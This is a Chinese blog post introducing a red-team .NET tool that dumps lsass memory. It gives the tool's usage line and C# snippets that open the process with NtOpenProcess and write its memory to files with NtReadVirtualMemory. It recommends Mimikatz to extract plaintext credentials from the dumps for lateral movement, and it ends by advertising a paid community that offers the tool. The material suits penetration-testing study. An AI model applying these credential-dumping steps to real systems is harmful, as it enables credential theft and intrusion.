正文

.NET 一款用于转储指定进程内存的工具

admin
admin V管理员 /0 评论 /40 阅读
1021
此篇文章发布距今已超过32天,您需要注意文章的内容或图片是否可用!

01

阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02

基本介绍

在红队活动中,转储进程的内存可以有效地提取用户凭据,特别是像 lsass 这样的关键进程,因为该进程负责处理身份验证和安全令牌。Sharp4ProDump.exe 就是这样一款内网渗透的工具,能够针对指定进程进行内存转储。

03

使用方法

Sharp4ProDump.exe 允许用户为指定进程生成内存转储文件。其基本使用方式如下所示。

Sharp4ProDump.exe ProcessName [FILE]

参数FILE为可选的输出文件名,默认为包含所有内存块的文件,其实在转储时也为每个内存区域生成一个文件。需要注意的一点,转储lsass进程需要以管理员身份执行, 而对于用户启动的进程,无需管理员权限,方便红队灵活选择目标。

比如,转储notepad.exe记事本进程时就无需管理员权限,普通权限下的cmd即可运行成功,如下图所示。

04

原理解析

默认情况下首先获取 lsass 进程的 ID,当然也可以指定为其他进程的名称,然后通过调用 NtOpenProcess 函数打开该进程,具体代码如下所示。

Process[] processesByName = Process.GetProcessesByName("lsass");
if (processesByName.Length == 0)
{
    Console.WriteLine("[-] Process not found.");
    Environment.Exit(0);
}
int id = processesByName[0].Id;
IntPtr zero = IntPtr.Zero;
Win32.NtOpenProcess(ref zero, 1040U, ref object_ATTRIBUTES, ref client_ID);

随后,使用 NtQueryVirtualMemory 函数查询进程的内存区域,并筛选出可读的内存块。对于每个合适的内存区域,工具调用 NtReadVirtualMemory 读取内存数据并写入到文件中。

while (Win32.NtQueryVirtualMemory(zero, intPtr, 0U, out memory_BASIC_INFORMATION, 48U, out num2) == 0)
{
    if (memory_BASIC_INFORMATION.Protect == 4 && memory_BASIC_INFORMATION.State == 4096)
    {
        byte[] array2 = new byte[(int)memory_BASIC_INFORMATION.RegionSize];
        Win32.NtReadVirtualMemory(zero, memory_BASIC_INFORMATION.BaseAddress, array2, (int)memory_BASIC_INFORMATION.RegionSize, out intPtr2);
        Program.WriteToFile(array2, (int)memory_BASIC_INFORMATION.RegionSize, filename);
    }
}

转储完成后,工具将每个内存区域的内容写入不同的 .dmp 文件,并生成一个包含所有内存块的汇总文件。

string filename2 = text + "_" + id.ToString() + "_allinone.dmp";
if (args.Length > 1)
{
filename2 = args[1];
}
Program.WriteToFile(array, array.Length, filename2);

一旦完成转储,红队可以利用一些工具(如 Mimikatz)分析这些内存转储文件,提取明文凭据和其他敏感信息。通过这种方式,红队可以实现横向移动、提权或其他后续攻击。

综上,Sharp4ProDump.exe 是红队在渗透测试中一个不可或缺的工具,通过高效地转储进程内存,获取关键凭据,为进一步的攻击奠定基础。工具已经打包在星球,感兴趣的朋友可以加入自取。

05

推荐阅读

从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!






06

欢迎加入.NET安全星球

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。 星球门票后期价格随着内容和质量的不断沉淀会适当提高,因此越早加入越好!

目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。

为了助力大家在2024国家级hvv演练中脱颖而出,我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集

.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输

这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术,更是每一位网络安全爱好者不可或缺的实战利器。


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-宙飒天下网